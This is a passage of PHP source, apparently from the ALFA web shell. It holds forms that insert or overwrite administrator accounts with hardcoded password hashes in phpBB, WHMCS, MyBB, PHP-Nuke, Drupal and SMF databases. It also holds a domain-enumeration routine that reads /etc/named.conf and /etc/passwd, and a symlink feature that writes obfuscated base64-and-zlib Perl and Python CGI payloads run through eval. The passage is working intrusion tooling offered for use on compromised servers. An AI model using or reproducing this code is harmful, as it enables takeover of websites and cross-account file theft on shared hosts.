3999$SQL = $_POST['alfa9'];
4000$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());
4001$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
4002$pw_col = @mysqli_num_rows($pw_col);
4003$adm_perm = "16744444";
4004if($pw_col > 0){
4005$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4006}else{
4007$adm_perm = "2143256444";
4008$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','$admin','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
4009}
4010$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4011$sole = mysqli_num_rows($solevisible);
4012if($sole == 1){
4013$solevis = mysqli_fetch_assoc($solevisible);
4014$res = $solevis['userid'];
4015}
4016$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));
4017if($solevisible){
4018__alert('Success... '.$admin.' is created...');}
4019}
4020}
4021if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4022
4023echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4024$table = array('td1' =>
4025 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4026 'td2' =>
4027 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4028 'td3' =>
4029 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4030 'td4' =>
4031 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4032 'td5' =>
4033 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4034 'td6' =>
4035 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4036 'td7' =>
4037 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4038 'td8' =>
4039 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4040);
4041create_table($table);
4042echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4043if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4044$localhost = $_POST['alfa2'];
4045$database = $_POST['alfa3'];
4046$username = $_POST['alfa4'];
4047$password = $_POST['alfa6'];
4048$admin = $_POST['alfa8'];
4049$SQL = $_POST['alfa9'];
4050$prefix = $_POST['alfa10'];
4051$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4052$hash = md5('solevisible');
4053$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4054$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4055$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
4056$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
4057$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4058if($solevisible){
4059__alert('Success... '.$admin.' is created...');
4060}
4061}
4062}
4063if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
4064
4065echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
4066$table = array('td1' =>
4067 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4068 'td2' =>
4069 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4070 'td3' =>
4071 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4072 'td4' =>
4073 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4074 'td6' =>
4075 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4076 'td7' =>
4077 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4078 'td8' =>
4079 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4080);
4081create_table($table);
4082echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4083if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4084$localhost = $_POST['alfa2'];
4085$database = $_POST['alfa3'];
4086$username = $_POST['alfa4'];
4087$password = $_POST['alfa5'];
4088$admin = $_POST['alfa8'];
4089$SQL = $_POST['alfa9'];
4090$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4091$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
4092if($solevisible){
4093__alert('Success... '.$admin.' is created...');}
4094}
4095}
4096if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
4097
4098echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4099$table = array('td1' =>
4100 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4101 'td2' =>
4102 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4103 'td3' =>
4104 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4105 'td4' =>
4106 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4107 'td5' =>
4108 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4109 'td6' =>
4110 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4111 'td7' =>
4112 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4113 'td8' =>
4114 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4115);
4116create_table($table);
4117echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4118if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4119$localhost = $_POST['alfa2'];
4120$database = $_POST['alfa3'];
4121$username = $_POST['alfa4'];
4122$password = $_POST['alfa5'];
4123$admin = $_POST['alfa8'];
4124$SQL = $_POST['alfa9'];
4125$prefix = $_POST['alfa10'];
4126$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4127$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
4128if($solevisible){
4129__alert('Success... '.$admin.' is created...');}
4130}
4131}
4132if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
4133
4134echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
4135$table = array('td1' =>
4136 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4137 'td2' =>
4138 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4139 'td3' =>
4140 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4141 'td4' =>
4142 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4143 'td5' =>
4144 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4145 'td6' =>
4146 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4147 'td7' =>
4148 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4149 'td8' =>
4150 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4151);
4152create_table($table);
4153echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4154if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4155$localhost = $_POST['alfa2'];
4156$database = $_POST['alfa3'];
4157$username = $_POST['alfa4'];
4158$password = $_POST['alfa5'];
4159$admin = $_POST['alfa7'];
4160$SQL = $_POST['alfa9'];
4161$prefix = $_POST['alfa10'];
4162$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4163$hash = md5($pwd);
4164$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4165if($solevisible){
4166__alert('Success... '.$admin.' is created...');}
4167}
4168}
4169if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
4170
4171echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
4172$table = array('td1' =>
4173 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4174 'td2' =>
4175 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4176 'td3' =>
4177 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4178 'td4' =>
4179 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4180 'td6' =>
4181 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4182 'td7' =>
4183 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
4184 );
4185create_table($table);
4186echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4187if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4188$localhost = $_POST['alfa2'];
4189$database = $_POST['alfa4'];
4190$username = $_POST['alfa5'];
4191$password = $_POST['alfa6'];
4192$admin = $_POST['alfa8'];
4193$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4194$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
4195$getDescuid = @mysqli_fetch_assoc($getDescuid);
4196$getDescuid = $getDescuid['uid'];
4197$getdescuid = $getDescuid++;
4198$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
4199$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
4200$sole = mysqli_num_rows($solevisible);
4201if ($sole == 1){
4202$solevis = mysqli_fetch_assoc($solevisible);
4203$res = $solevis['uid'];
4204}
4205$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
4206if($solevisible){
4207__alert('Success... '.$admin.' is created...');}
4208}
4209}
4210
4211if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
4212
4213echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
4214$table = array('td1' =>
4215 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4216 'td2' =>
4217 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4218 'td3' =>
4219 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4220 'td4' =>
4221 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4222 'td5' =>
4223 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
4224 'td6' =>
4225 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4226 'td7' =>
4227 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4228 );
4229create_table($table);
4230echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4231if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4232$localhost = $_POST['alfa2'];
4233$database = $_POST['alfa3'];
4234$username = $_POST['alfa5'];
4235$password = $_POST['alfa6'];
4236$prefix = $_POST['alfa7'];
4237$admin = $_POST['alfa8'];
4238$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4239$setpwAlg = sha1(strtolower($admin) . 'solevisible');
4240$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
4241if($solevisible){
4242__alert('Success... '.$admin.' is created...');}
4243}
4244}
4245echo "</div>";
4246alfafooter();
4247}
4248function alfaMakePwd(){
4249 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
4250 return "/home/{user}/public_html/";
4251 }
4252 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
4253 $public = end($document);
4254 array_pop($document);
4255 array_pop($document);
4256 $path = implode("/", $document) . "/{user}/" . $public;
4257 return $path;
4258}
4259function alfaGetDomains($state = false){
4260 $state = "named.conf";
4261 $lines = array();
4262 $lines = _alfa_file('/etc/named.conf');
4263 if(!$lines){
4264 $lines = @scandir("/etc/valiases/");
4265 $state = "valiases";
4266 if(!$lines){
4267 $lines = @scandir("/var/named");
4268 $state = "named";
4269 if(!$lines && $state){
4270 $lines = _alfa_file('/etc/passwd');
4271 $state = "passwd";
4272 }
4273 }
4274 }
4275 return array("lines" => $lines, "state" => $state);
4276}
4277function alfaCreateParentFolder(){
4278 $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
4279 if(!@is_dir($parent)){
4280 @mkdir($parent, 0755, true);
4281 }
4282}
4283function alfasymlink(){
4284alfahead();
4285AlfaNum(9,10);
4286alfaCreateParentFolder();
4287@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
4288echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
4289if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
4290 $sympath = alfaMakePwd();
4291 @mkdir('cgialfa',0755);
4292 @chdir('cgialfa');
4293 alfacgihtaccess('cgi');
4294 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';
4295 $py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
4296 $cginame = "symperl.alfa";
4297 $source = $perl;
4298 $lang = "perl";
4299 if($_POST["alfa2"]=="sympy"){
4300 $cginame = "pysymlink.alfa";
4301 $source = $py;
4302 $lang = "python";
4303 }
